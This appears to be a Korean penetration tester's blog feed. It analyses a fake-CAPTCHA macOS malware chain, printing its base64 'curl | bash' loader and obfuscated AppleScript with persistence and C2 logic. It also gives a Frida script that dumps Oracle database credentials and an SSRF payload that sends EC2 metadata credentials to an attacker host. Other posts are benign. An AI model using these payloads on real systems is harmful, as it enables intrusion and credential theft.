annyoung

I'm not a robot 피싱

nopsled — Fri, 10 Apr 2026 10:56:03 +0900

어떤 웹 사이트에서 로봇이 아닌걸 증명해야 한다고 터미널에서 무언가 실행하라고 하길래 무슨 동작을할까 싶어서 살짝 찍먹해봤다.

echo "Y3VybCAtcyAnaHR0c***[REMOVED]***2gnIHwgYmFzaA==" | base64 -d | bash

복사된 내용은 위와 같았고, base64로 인코딩된 문자열을 디코딩하여 bash 쉘로 실행해주는 역할을 하는데 디코딩하게되면 다음과 같은 내용이 나온다.

curl -s 'https://***[REMOVED]***.digital/script.sh' | bash

마찬가지로 curl의 -s 옵션을 줬는데 slient mode로 output을 출력하지 않고 해당 script.sh를 다운로드 받아 bash 쉘로 실행하며 실행되는 내용은 다음과 같다.

osascript -e "$(echo "ZG8gc2hlbGwgc2***[REMOVED]***+DQo8L3BsaXN0Pg0=" | base64 -d)"

osascript(AppleScript)의 -e(execute) 옵션을 사용해 base64로 인코딩된 무언가를 디코딩한 후 실행한다.

do shell script "
SCRIPT_PATH=\"$HOME/Library/jaqyeseegglnlxbj\";
mkdir -p \"$HOME/Library/LaunchAgents\";
cat > \"$HOME/Library/LaunchAgents/com.jaqyeseegglnlxbj.plist\" <<END_PLIST
<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
  <dict>
    <key>Label</key>
    <string>com.jaqyeseegglnlxbj</string>
    <key>KeepAlive</key>
    <true/>
    <key>RunAtLoad</key>
    <true/>
    <key>ProgramArguments</key>
    <array>
        <string>/bin/bash</string>
        <string>-c</string>
        <string>echo 'c2V0IF9xV3NNWVQ0eiB0***[REMOVED]***gplbmQgaWY=' | base64 -d | osascript</string>
    </array>
  </dict>
</plist>
END_PLIST
"
do shell script "launchctl unload ~/Library/LaunchAgents/com.jaqyeseegglnlxbj.plist 2>/dev/null"
do shell script "launchctl load ~/Library/LaunchAgents/com.jaqyeseegglnlxbj.plist"

데몬 등록해서 컴퓨터가 켜질때 자동으로 바이너리가 실행될 수 있도록 하는데, bash쉘로 c(command)옵션을 줘서 base64로 인코딩된 문자열을 디코딩한 후 다시 osascript로 실행하는 역할을 한다.

set _qWsMYT4z to "hqCnS8YTVCQx0"
set _m2i0igRQy to "XtiNS5rmLuWcE"
set __xbFfmLcXA to (475 + 350) * 7
set __wb3jlMkzPTd to 168.2011
property ***[REMOVED]*** : {((character id 112) & ***[REMOVED]*** & (ASCII character 99) & "f" & "d")}
property ***[REMOVED]***: ""
property ***[REMOVED]***: ("f0" & ***[REMOVED]*** & (ASCII character 100) & (character id 101) & (character id 52) & "a" & "9" & (character id 54) & (character id 50) & (character id 48) & (ASCII character 50) & (character id 57) & "b66" & "ed" & (character id 56) & (character id 53) & (ASCII character 101))
property ***[REMOVED]*** : ""

on __ORuyqOlns5()
    repeat with _PfgtcEkdQ in __Ec0tcgIh
        set _cMKkcc1N to (contents of _PfgtcEkdQ)
        set __kSC4ZSAG7 to ((ASCII character 104) & "t" & (ASCII character 116) & "p" & (ASCII character 58) & (ASCII character 47) & (character id 47)) & _cMKkcc1N & (character id 47)
        try
            set __apV8lF0 to do shell script (***[REMOVED]***) & (character id 49) & "0 ") & quoted form of __kSC4ZSAG7
            if __apV8lF0 is ("s" & "u" & "c" & (character id 99) & "e" & "s" & (ASCII character 115)) then
                set __gXHhFRhSUW to ***[REMOVED]***
                return true
            end if
        end try
    end repeat
    try
        set _cMKkcc1N to ***[REMOVED]***(ASCII character 108) & (character id 32) & "-" & (character id 115) & (ASCII character 32) & "-" & (character id 45) & "co" & (character id 110) & "n" & (ASCII character 101) & (character id 99) & (character id 116) & (ASCII character 45) & (ASCII character 116) & (ASCII character 105) & "m" & (ASCII character 101) & (ASCII character 111) & "ut" & " " & (ASCII character 53) & (ASCII character 32) & (ASCII character 45) & "-" & (ASCII character 109) & "a" & (ASCII character 120) & "-" & (ASCII character 116) & (ASCII character 105) & (ASCII character 109) & (character id 101) & (ASCII character 32) & (ASCII character 49) & (ASCII character 48) & (ASCII character 32) & (ASCII character 104) & (character id 116) & "tps" & (ASCII character 58) & (character id 47) & "/" & "t." & (ASCII character 109) & (ASCII character 101) & "/" & "ax0" & "3b" & "o" & (ASCII character 116) & " | " & (character id 115) & (character id 101) & (character id 100) & (character id 32) & "-n " & (character id 39) & (ASCII character 115) & (ASCII character 47) & (ASCII character 46) & (character id 42) & "<" & (ASCII character 115) & "p" & "a" & (ASCII character 110) & " " & (character id 100) & (ASCII character 105) & (character id 114) & (character id 61) & (character id 34) & (character id 97) & (ASCII character 117) & "to" & (character id 34) & (character id 62) & (character id 92) & (ASCII character 40) & (ASCII character 91) & "^" & (character id 60) & (ASCII character 93) & (ASCII character 42) & (character id 92) & (character id 41) & "<" & (ASCII character 92) & (ASCII character 47) & (ASCII character 115) & (ASCII character 112) & (character id 97) & (character id 110) & ">" & "." & "*/" & (character id 92) & "1/" & (ASCII character 112) & (character id 39))
        set __kSC4ZSAG7 to (string id {104, 116, 116, 112, 58, 47, 47}) & _cMKkcc1N & (character id 47)
        set __apV8lF0 to do shell script ("/" & ***[REMOVED]*** & (ASCII character 117) & (character id 114) & (character id 108) & " " & (ASCII character 45) & (ASCII character 115) & " " & (ASCII character 45) & (character id 72) & (character id 32)) & quoted form of _c7Y0vxsS1J & (" " & "-" & (ASCII character 100) & (character id 32) & (ASCII character 34) & (character id 99) & "h" & (character id 101) & (ASCII character 99) & (character id 107) & (ASCII character 34) & " --" & "c" & "onn" & (ASCII character 101) & (ASCII character 99) & "t-t" & "ime" & "out" & (character id 32) & "5" & (character id 32) & (character id 45) & "-" & (ASCII character 109) & (character id 97) & "x" & (ASCII character 45) & "ti" & (ASCII character 109) & (character id 101) & (ASCII character 32) & (ASCII character 49) & "0" & (ASCII character 32)) & quoted form of __kSC4ZSAG7
        if __apV8lF0 is ((ASCII character 115) & "ucc" & (character id 101) & (character id 115) & (character id 115)) then
            set __gXHhFRhSUW to __kSC4ZSAG7
            return true
        end if
    end try
    return false
end __ORuyqOlns5

set _c7Y0vxsS1J to ((ASCII character 85) & (ASCII character 115) & (ASCII character 101) & "r-" & (ASCII character 65) & (ASCII character 103) & "e" & (character id 110) & "t: " & (character id 77) & (character id 111) & "zil" & (ASCII character 108) & (ASCII character 97) & (ASCII character 47) & (character id 53) & (ASCII character 46) & (ASCII character 48) & (ASCII character 32) & (character id 40) & "Mac" & "in" & (character id 116) & (ASCII character 111) & (character id 115) & "h" & ";" & (character id 32) & (ASCII character 73) & (character id 110) & "t" & "el" & (character id 32) & (ASCII character 77) & (character id 97) & (ASCII character 99) & " " & (character id 79) & "S" & (character id 32) & (character id 88) & " " & "1" & (character id 48) & (ASCII character 95) & "1" & (character id 53) & (ASCII character 95) & (ASCII character 55) & (ASCII character 41) & " A" & (character id 112) & (character id 112) & (ASCII character 108) & "e" & (ASCII character 87) & (ASCII character 101) & (character id 98) & (ASCII character 75) & (ASCII character 105) & (character id 116) & (ASCII character 47) & (ASCII character 53) & (character id 51) & (ASCII character 55) & (ASCII character 46) & (ASCII character 54) & (character id 55) & " " & (ASCII character 40) & (ASCII character 75) & (character id 72) & (ASCII character 84) & (character id 77) & (ASCII character 76) & (character id 44) & (character id 32) & (character id 108) & (character id 105) & (ASCII character 107) & (ASCII character 101) & (ASCII character 32) & "Gec" & "k" & (ASCII character 111) & (character id 41) & (character id 32) & "C" & (character id 104) & (character id 114) & "o" & (character id 109) & "e/1" & (ASCII character 52) & "5" & (character id 46) & (character id 49) & (ASCII character 46) & (character id 52) & (character id 46) & "1" & "1" & " " & (ASCII character 83) & (character id 97) & "f" & (ASCII character 97) & (ASCII character 114) & (character id 105) & (ASCII character 47) & (character id 53) & "37" & "." & "67")

if __ORuyqOlns5() then	
	set __Oxs1TXRuMan to (string id {99, 117, 114, 108, 32, 45, 115, 32, 45, 45, 99, 111, 110, 110, 101, 99, 116, 45, 116, 105, 109, 101, 111, 117, 116, 32, 53, 32, 45, 45, 109, 97, 120, 45, 116, 105, 109, 101, 32, 49, 48, 32, 45, 45, 114, 101, 116, 114, 121, 32, 51, 32, 45, 45, 114, 101, 116, 114, 121, 45, 100, 101, 108, 97, 121, 32, 50, 32}) & ((ASCII character 45) & (ASCII character 88) & (ASCII character 32) & (ASCII character 80) & (ASCII character 79) & (character id 83) & (ASCII character 84) & (character id 32)) & quoted form of __gXHhFRhSUW & (character id 32) & ((ASCII character 45) & (ASCII character 72) & (character id 32)) & quoted form of _c7Y0vxsS1J & (character id 32) & ((ASCII character 45) & (ASCII character 100) & (character id 32)) & quoted form of (((character id 116) & (ASCII character 120) & (ASCII character 105) & (character id 100) & (character id 61)) & _bHwoo7HIuGJ & ((character id 38) & (character id 98) & "m" & "o" & (ASCII character 100) & "ul" & (ASCII character 101))) & ((character id 32) & (character id 124) & (character id 32) & "o" & (ASCII character 115) & (character id 97) & (character id 115) & (character id 99) & "rip" & (character id 116))
    set __v8kRbKEqefd to do shell script __Oxs1TXRuMan
end if

최종적으로 위와 같은 애플스크립트가 나오며 다음과 같은 행동을 한다.

1) __Ec0tcgIh 함수에서는 C2 도메인을 구해온 후 연결시도

-> C2 서버로 요청하고 응답 성공하는 경우 C2 URL을 받아오고, 실패하는 경우 텔레그램 봇을 통해 대체 도메인 받아 C2 서버를 셋팅함(Fallback C2)

2) _bHwoo7HIuGJ의 경우 트랜잭션 ID를 구함

3) _c7Y0vxsS1J에서는 User-Agent를 만든다.

결과적으로는 C 서버로부터 데이터를 전달받아 애플 스크립트로 무언가를 실행하는데, C2 서버 도메인 몇번 들락날락 했더니 CF에서 차단함...

결론은 복붙 조심하자!

웹페이지에서는 fetch("https://www.naver.com/favicon.ico");라고 써있어서 복사하기 했는데, 실제로는 저런 악성코드를 직접 실행할 수도 있으니까 말이다.

Frida hooking oracle connect CS binary

nopsled — Thu, 19 Mar 2026 16:13:25 +0900

Delphi로 만든 CS 프로그램 모의해킹 진행하면서 몇가지 적어보려고 한다.

기본적으로 델파이로 만든 CS 프로그램의 경우 폴더 구조를 살펴보면 *.bpl 이라는 확장자를 사용하곤 하는데 Borland Package Library의 줄임말로, 쉽게 말하자면 Delphi에서 사용하기 위한 dll이라 생각하면 된다. 그렇기에 bpl 확장자가 보이면 "아. 델파이구만!" 하면 된다.

대다수의 델파이로 만든 CS 프로그램이 Oracle TNS Protocol을 이용해 DB와 직접 커넥션을 맺는데, 이렇게 DB로 바로 접속하게되면 개발사의 장점은 유지보수가 쉽다는거고, 단점은 DB 계정 정보가 무조건적으로 노출된다는거다.

여기서 DB 계정정보를 Config.ini에 암호화해서 저장하더라도 DB 연결을 위해 복호화하게 되는데 치트엔진으로 string 위주로 간단하게 메모리에서 열심히 찾아봐도 되고, 설정을 저장하고 있는 파일(Config.ini 등)에 나오는 아이디, 비밀번호를 서로 바꿔서 메모리를 확인하는 꼼수를 사용해도 된다.

아니면 그냥 loadLibrary로 원하는 호출 이후 frida 스크립트짜서 돌려도 되긴한다.

다음은 dbxora30.dll!DBXConnection_Connect 이후, char* 문자열 3개(DB, USER, PASS)를 받아 길이를 계산하고 실제 OCI(Oracle Call Interface) 연결 함수로 넘겨주는 wrapper를 후킹하는 스크립트다.

참고로 여기서 가져오지 못하는 대상 아이피 또는 Local Naming을 이용해 접속하는 경우 tnsnames.ora 파일이나 wireshark에서 tns로 필터링해서 확인하면 된다.

/**
 * Frida>=17.5.1
 * Hook oracle connection db, user, password
 */
const loadLibrary = Process.getModuleByName("kernel32.dll").getExportByName("LoadLibraryA");
let isModuleLoaded = false;
let isHookAttached = false;

Interceptor.attach(loadLibrary, {
    onEnter: function (args) {
        this.library_path = args[0].readUtf8String();
        if (this.library_path === "dbxora30.dll") {
            isModuleLoaded = true;
        }
    },
    onLeave: function (retval) {
        if (isModuleLoaded && !isHookAttached) {
            isHookAttached = true;
            const hookTarget = Process.getModuleByName("dbxora30.dll").base.add(0x12FF8);
            Interceptor.attach(hookTarget, {
                onEnter: function (args) {
                    const db = args[1].readAnsiString();
                    const user = args[2].readAnsiString();
                    const pwd = args[3].readAnsiString();

                    console.log();
                    console.log(`[+] Oracle Connect`);
                    console.log(`DB     : ${db}`);
                    console.log(`User   : ${user}`);
                    console.log(`Password: ${pwd}`);
                }
            }); 
        }
    }
});

docxtpl을 이용한 보고서 자동화

nopsled — Mon, 23 Feb 2026 12:44:23 +0900

보고서 작성에 지루함을 느낀 사람이라면 공감할거라 생각한다.

한 3년동안은 보고서를 수동으로 쓰다가 이거 어느정도 자동화 되겠는데? 싶어서 오토핫키로 처음에 맛만 봤다가 퍼포먼스가 너무 하자있어서 python으로 포팅하고 나서 지금까지 잘 쓰고있다.

모듈은 이걸 사용했다:

https://docxtpl.readthedocs.io/en/latest/

이처럼 보고서에다가 jinja template을 사용하면 잘 채워준다. docx에 코딩이라니..ㅋ

참고로 paragraph와 indentation이 조금 헬이니 참고할 것...

이미지 테두리 삽입하는 기능을 모듈에서 지원하지 않아 직접 구현했었으니 필요하면 참고하시라:

https://nopsled.tistory.com/320

python docx add border to image

VBScript로 테두리 넣으려니 자꾸 에러가 난다.. 게다가 웹에서 보고서 뽑을때 Table 셀들을 Merge해서 다운로드하고 있는데, VBScript로 후처리를 해주는 것보다 보고서 생성하면서 테두리를 넣는게 좋

nopsled.tistory.com

아무도 알려주지 않는 유령판매자의 진실(feat. G마켓)

nopsled — Wed, 11 Feb 2026 17:17:10 +0900

알려줬을지도 모르지만 제목을 조금 자극적이게 지어봤다.

유령 판매자라고 들어봤을지 모르겠다.

* 유령 판매자란? 온라인 쇼핑몰이나 오픈마켓(쿠팡, 네이버 스마트스토어 등)에서 실제로는 상품을 보유하지 않거나 유령 회사(페이퍼 컴퍼니) 형태로 존재하면서, 사기 행각이나 개인정보 탈취를 목적으로 활동하는 판매자를 말합니다.(Ai 요약)

아마 나같은 사람이 있을지 모르겠는데 오픈마켓(G마켓, 쿠팡, 스마트스토어 등)에서 물품을 구매한 후, 배송이 너무 안와서 판매자에게 문의를 하면 재고가 없다면서 취소해달라하며 상품을 받지 못하는 경우가 존재할거라 생각한다.

이로 인해 생기는 소비자의 문제는 물품 대금이 카드 결제 한도로 잡히게 되고 시간을 낭비한다. 그렇다고 정작 판매자에게는 자세한 패널티가 없다.

필자의 경우 최근에 핸드폰을 128GB로 쓰고 있어서 여유 용량이 5GB 남아서 여분의 백업 디스크를 사야했다. 요즘 SSD, 램 값이 엄청 뛰어올라버렸는데 알리에서 SN740 1TB 제품만 봐도 15~20의 가격을 형성하고 있다.

아무튼.. 유령판매자는 애초에 발송할 생각없이 크롤링을 통해 스마트스토어, 쿠팡 등의 타 사용자가 업로드한 상품의 상세페이지를 크롤링하고 오픈마켓으로 업로드한다.(상세페이지 내 이미지 URL을 확인해보면 원본 판매자를 찾을 수 있다)

그리고 소비자는 저렴한 가격에 구매한 후 개인정보는 유령판매자에게 넘어가게 된다.

* 나이드신 분들이 보이스피싱 당하는 이유가 이뿐만이 아니라, 어디에선가 개인정보가 새어나갔을거다. 요즘 핫한 침해사고 등..

첫 번째로 시세보다 8만원 정도 더 싸게나온 매물이 있어서 옵션 오류일까? 싶어서 한 판매자에게 구매했는데 결국 취소엔딩됐다. 참고로 이후 판매자 정보를 봤을때 중국 업체로 확인됐다.

역시나 주문 후 "한국으로 배송중"으로 바뀌었는데 연락도 없다가 문의를 남기니까 그제서야 재고가 없다고 취소했다고 한다.

이때 어쩌다보니 처음으로 유령 판매자라는게 있는게 알게 되었고, G마켓 고객센터에 문의에 남겨 유령 판매자 같다고 제재 해달라고했다.

그런데 이 일이 있고나서 대략 2주가 지났을 무렵.. 평소에 오지도 않던 검찰 보이스피싱 전화가 왔다.

두 번째로 당했던 케이스인데 시세보다 2~3만원 정도 조금 저렴하게 나왔길래 바로 샀으나, 역시나 "한국으로 배송중"으로 나오고 5일 정도 연락이 없어서 먼저 연락했더니 취소 엔딩.

이러고 판매자 정보에서 나오는 핸드폰 번호로 확인했더니 불법적인 일들을 하고 있었다.

아무리 오픈마켓이라 해도 이런 사람들을 가입시켜주는게 맞을까?

구매자가 상품을 구매하기 전에 판매자의 신용도나 평판이나 정보들을 찾아보면서 구매해야 하는게 맞을까?

결국 유령 판매자는 이름/집주소/핸드폰번호/개인통관고유번호/공동현관 비밀번호 등을 수집할 수 있다.

오픈마켓의 가입 절차가 어떻게 되는지 모르겠다만 까다롭지 않으니 판매자 승인을 해주는게 아닌가싶다.

너무 화가나서 G마켓 판매자 정책도 찾아보고 문의했더니 처음으로 G마켓 고객센터에서 전화가 와서 설명해주더라.

역시 강하게 얘기해야 듣는거 같다.. 정말 또 당하면 소보원에 민원을 넣어볼 생각이다. 보이스피싱 방관이지 않을까?

이게 재고의 문제가 아니라 애초에 판매자는 발송할 의지가 없었고 개인정보를 취득하기 위함일텐데 참 답답하다.

참고로 G마켓에서 해당 판매자에게 패널티를 적용한다고는 하는데, 몇번만의 패널티로 아웃되는지 모르겠다.

대부분의 사람들은 그냥 재고가 없어서 취소됐구나 생각할 수도 있을텐데, 곰곰히 판매자의 정보로 구글링해보고 잘 생각해보자.

SSRF

nopsled — Thu, 22 Jan 2026 13:16:04 +0900

피해자 환경은 공격자 서버로 요청할 수 있게끔 iframe의 src attribute에 삽입해서 userAgent를 확인했을때 IE11+Windows로 파악했다.

더 확실하게 확인하기 위해서 iframe의 src에 http://localhost와 file:///C:\\ 했을때 결과를 봤다. iframe에서 에러난 화면이 ie11로 보였다. ie11 익스를 하려고 했는데 장애가 있을까봐 시도해보진 못했다.

우선 file 스키마나 cors는 브라우저가 이미 애초에 로컬 리소스를 띄워줬기 때문에 접근이 가능했지 않았을까 하는 생각이든다. 아니면 애초에 레거시 브라우저라서 가능했을 수도 있다.

아무튼 ec2 metadata 엔드포인트에 요청했고 다행히 credentials을 받아낼 수 있었다. 하지만 변수가 있었는데 iframe src에 metadata url을 삽입한 후 결과를 보면 sessionToken이 너무 길어서 pdf에선 짤리기 때문에 외부 요청이 필요했다.

var xhr = new XMLHttpRequest();
xhr.open("GET", "http://169.254.169.254/latest/meta-data/iam/security-credentials/{IAM_ROLE_NAME}", true);
xhr.onreadystatechange = function () {
  if (xhr.readyState === 4) {
    var img = new Image();
    img.src = "http://{ATTACKER_IP}/?enc=" + btoa(xhr.responseText);
    document.body.appendChild(img);
  }
};
xhr.send();

그래서 만든 요것. 이렇게해서 img get 방식으로 cors를 우회할 수 있다.

입력 문자의 제한이 있고 CSP가 없다면 공격자 서버에 해당 js를 올려놓고 await import('http://ATTACKER\_URL/something.js'); 하는 식으로 사용해도 된다.

이렇게 탈취한 3가지 키인 aws_access_key_id, aws_secret_access_key, aws_session_token을 가지고 aws s3 ls나 aws ec2 describe-instances를 통해 버킷이나 인스턴스를 확인할 수 있다.

IAM role이 피해자 인스턴스에 과도하게 잡혀있다면 start-instances나 stop-instances 등이 가능하다.

AWS CPUUtilization

nopsled — Mon, 12 Jan 2026 10:27:23 +0900

우리 회사와 모회사에서 사용하는 AWS는 t3.micro 그리고 t2.medium을 사용하는 것으로 기억하는데, 가끔 가다가 cpu가 maximum을 찍어서 ssh나 웹서버가 죽는 현상이 발생했다. 사용자들이 많이 접속하지 않아 적은 스펙으로도 운영할 수 있는 그런 서비스들이라 생각했는데 인스턴스들이 자주 pending 되어버리는 현상이 발생했다.

t2나 t3 인스턴스들은 사용하지 않는 경우 CPU 크레딧을 적립하고 많이 사용되는 경우 적립된 크레딧을 가지고 CPU를 버스트하여 퍼포먼스를 끌어올릴 수 있는데, 버스트를 하고 있음에도 불구하고 뻗어버렸다.

공통적으로 알 수 있는건 CloudWatchd에서 CPUUtilization이 6이상 9까지 찍어버리는데, 이 경우 서버의 모든 프로세스가 pending되어 접속도 불가능하기 때문에 서버를 항상 재시작해줬다.

-> 이후 트러블슈팅은 불가능하다 생각해서 인스턴스 스펙이 낮은 모회사는 CloudWatch로 CPUUtilization이 임계치(>=7)를 넘어가는 경우 서버를 자동으로 재시작하도록 설정해놨다.

그렇게 시간이 지나고.. 원인을 찾으려고 노력해봤다.

MongoDB connections

우선각종 로그를 봤으나 파악이 불가능했는데, 첫 번째로 가장 의심이 드는 경우는 uwsgi/wsgi 앱에서 사용자 요청에 따라 DB 세션이 각각 생성되어 cpu를 많이 잡아먹는다 정도로 유추했으나, mongo 클라이언트로 주기적으로 확인해봤으나 세션이 무한정 생성되는 케이스는 아니였던 것으로 파악했다.

> db.serverStatus().connections
{
    "current" : 9,
    "available" : 51191,
    "totalCreated" : 13,
    "active" : 4,
    "exhaustIsMaster" : 3,
    "exhaustHello" : 0,
    "awaitingTopologyChanges" : 3
}

주기적으로 ssh 접속해서 직접 확인해봤는데 가장 드는 의심은 메모리 사용량이였다.

A서버 Server Memory

root@ip-172-31-45-72:/home/nopsled# free -h
               total        used        free      shared  buff/cache   available
Mem:           914Mi       703Mi       104Mi       3.2Mi       264Mi       210Mi
Swap:             0B          0B          0B

B서버 Server Memory

root@ip-172-31-40-67:/var/www/copies-server# free -h
              total        used        free      shared  buff/cache   available
Mem:          1.9Gi       873Mi        78Mi       2.0Mi       1.0Gi       883Mi
스왑:          0B          0B          0B

B서버의 경우 A서버에 비해 그나마 스펙이 조금 높게 잡혀있는데, 아직까지는 메모리 사용량이 현저히 낮지만 어느 시점에 갑자기 이 메모리가 누적되기 시작하더니 가용 메모리가 3%미만으로 남아버리는 케이스가 발생했다. 그 이후 메모리가 부족하니 CPU 사용량이 높아지고 서버가 죽어버리는 케이스였다.

알고보니 wiredTiger 엔진의 cache 메모리를 좀 줄여야하는 상황인데, 당장 운영하기에는 테스트가 불가능할 것 같아서 현재는 crontab으로 주기적으로 MongoDB 서비스를 재시작함으로써 캐시를 초기화해주는 임시방편을 선택했다.

그래서 업무가 시작되기 전인 8시 50분과 점심시간이 끝나기전 12시 50분 그리고 업무가 끝난 후 18시 55분쯤 서비스를 재시작함으로써 잠시 숨을 돌릴 수 있게된 것 같다.(사실 바로 어제 주말에 작업해놔서 잘 되지 않을까 싶긴하다...)

cacheMemory를 줄이고 반영되면 이후 다시 쓰도록하겠다.

나도 당한 CVE-2025-55182

nopsled — Thu, 18 Dec 2025 20:37:42 +0900

어제인가...? RSC Security Tool이라는 chrome extesion이 있길래 엇? 나도 한번 테스트 해봐야지~ 싶어서 로컬로 취약한 next.js를 설치하고 12월 17일 15:38쯤 구동했다.

그렇게 테스트를 마쳐서 RSC Tool이 편하긴 하구나~ 하고 넘겼는데, 다른 일 하느라 끄는걸 까먹었다.

특히나 여기서 중요한건 우리집 맥북 아이피는 DMZ로 설정되어 있어서 외부에 오픈되어 있다는 점.. 까먹고 그냥 냅뒀다.

다음날.. 12월 18일 20:00쯤 터미널 탭 1번에서 열심히 돌아가고 있는 next.js 녀석을... 봐버렸다.

거의 뭐 그냥 리얼망에 구축된 허니팟 수준

이거 뭐.. S사 허니팟도 아니고.... 미치겠네

공격자들이 좋아한다는 tmp 폴더가 바로 생각이나서 확인했음..

WTF lrt..?

오늘 아침 07:31에 생긴 lrt 파일 머고.....?

예..?

선생님 ELF요......?

바이러스토탈에도 안나오는 따끈따끈한 MD5더라....

그래도 ELF라서 실행은 안됐을텐데 그래도 나름 다행이다..

근데 이거 누가 어디에서 공격한지도 모르고.. 로그도 안남고.. 어우 찝찝해죽겠네

~~목매달뻔했다....~~

MacOSX Tahoe(타호) 업데이트

nopsled — Wed, 17 Dec 2025 16:03:50 +0900

2019 인텔맥 16인치를 사용하고 있는데 공장초기화를 하면 Catalina로 설치된다.

Catalina에서 바로 Tahoe로 업데이트 치려고 했는데 무한 루프에 빠져버린다. 설치 단계로 진입 후 4시간째 10%에서 멈춰서 진행이 안되는듯하다. 버그지 않을까..

그래서 이걸 해결하기 위해 AppStore에서 Sequoia를 검색해서 해당 업데이트를 하면 잘된다.

혹시 몰라서 이번엔 애플 계정 연동안하고 Sequoia까지 업데이트 하니까 잘됐음.

지금은 Tahoe로 업데이트하려고 기다리는중인데 완료가 되면 후기 남기도록 하겠다.

어제부터 오늘까지 하루종일 붙잡고 6번은 지운듯하다.. 징글징글하네 징글벨

* 추가 후기: 이렇게 했더니 타호까지 업데이트 잘된다.

jeb mcp

nopsled — Thu, 20 Nov 2025 09:30:28 +0900

난독화된 앱을 분석할 일이 있어서 jeb로 열어봤는데, 구버전의 경우 난독화 코드를 보여줬지만 최신 버전은 난독화를 계산하고 풀어서 디컴파일해준다.

좌: 구버전에서 난독화된 화면 / 우: 최신버전에서는 난독화가 어느정도 풀린 화면

이정도 스트링 가지고 뭐가 도움이 되냐?

좌: 구버전에서는 난독화된 화면 / 우: 최신버전에서는 난독화가 어느정도 풀린 화면

위 화면을 보면 생각보다 잘 풀리는걸 볼 수 있다.

게다가 이런 앱들 같은 경우 일반적으로 사용하는 암호화 함수를 setEncrypt()처럼 호출하지 않고, setLoadResource()처럼 호출하는데 분석을 방해하기 위해서 일부러 의미없는 문자열로 치환해놓는다.

게다가 추가로 분석을 방해하기 위해서 어떤 결과 값에 % 0x80하거나, AudioTrack->getMaxVolume()과 같은 쓰레기 값들이 포함되어 있는데 마찬가지로 분석을 방해하기 위함이다.

그렇기에 분석을 빠르게 하기 위해서 Ai를 붙여봤는데 생각보다 결과가 좋다.

cursor에 jeb_mcp를 연동해서 agent 모드로 실행했고, AES_KEY, IV값을 알려달라고 요청했다.

좀 걸리긴 했으나 자기 혼자 복호화하고 난독화하고 시도를 하더니 AES_KEY와 IV 값들을 모두 알려준다.

사람의 손을 탔으면 진짜 좀 오래걸렸을텐데 역시 AI...

만약 mcp 안쓴다고 한다면 apktool로 smali로 디컴파일하고, smali를 분석해달라고 하면 되긴 하는데 context가 많이 나올거다.

코드 로직들을 보고 우회할 수 있게 Response 짜달라고 하는 식의 질문을 하면 얼추 비슷하게는 만들어 주는데, 100%로 맞춰주진 않더라...

vimrc 설정

nopsled — Fri, 7 Nov 2025 11:20:22 +0900

필자가 쓰는 vim 설정 파일인데, 어디서 가져와서 쓴진 모르겠는데 거의 10년?째 잘 쓰고있다.

~/.vimrc에 다음 설정파일 넣으면 된다.

set hlsearch " 검색어 하이라이팅
set nu " 줄번호
set autoindent " 자동 들여쓰기
set scrolloff=2
set wildmode=longest,list
set ts=4 "tag select
set sts=4 "st select
set sw=1 " 스크롤바 너비
set autowrite " 다른 파일로 넘어갈 때 자동 저장
set autoread " 작업 중인 파일 외부에서 변경됬을 경우 자동으로 불러옴
"set cindent " C언어 자동 들여쓰기
set bs=eol,start,indent
set history=256
set laststatus=2 " 상태바 표시 항상
"set paste " 붙여넣기 계단현상 없애기
set shiftwidth=4 " 자동 들여쓰기 너비 설정
set showmatch " 일치하는 괄호 하이라이팅
set smartcase " 검색시 대소문자 구별
set smarttab
set smartindent
set softtabstop=4
set expandtab " 탭을 띄워쓰기로 치환
set tabstop=4
set ruler " 현재 커서 위치 표시
set incsearch
set statusline=\ %<%l:%v\ [%P]%=%a\ %h%m%r\ %F\
" 마지막으로 수정된 곳에 커서를 위치함
au BufReadPost *
\ if line("'\"") > 0 && line("'\"") <= line("$") |
\ exe "norm g`\"" |
\ endif
" 파일 인코딩을 한국어로
"if $LANG[0]=='k' && $LANG[1]=='o'
"set fileencoding=korea
"endif
" 구문 강조 사용
if has("syntax")
 syntax on
endif
" 컬러 스킴 사용
colorscheme jellybeans

컬러 스킴은 다음 파일을 ~/.vim/colors/jellybeans.vim으로 저장하면 된다. (안쓸거라면 위에있는 colorscheme 부분을 주석하거나 제거할 것!!)

jellybeans.vim

0.02MB

그리고 자주 쓰는 커맨드인데, :%s/찾을꺼/바꿀꺼 입력하면 한번에 바뀌기 때문에 너무 편리하니까 자주 써보세요.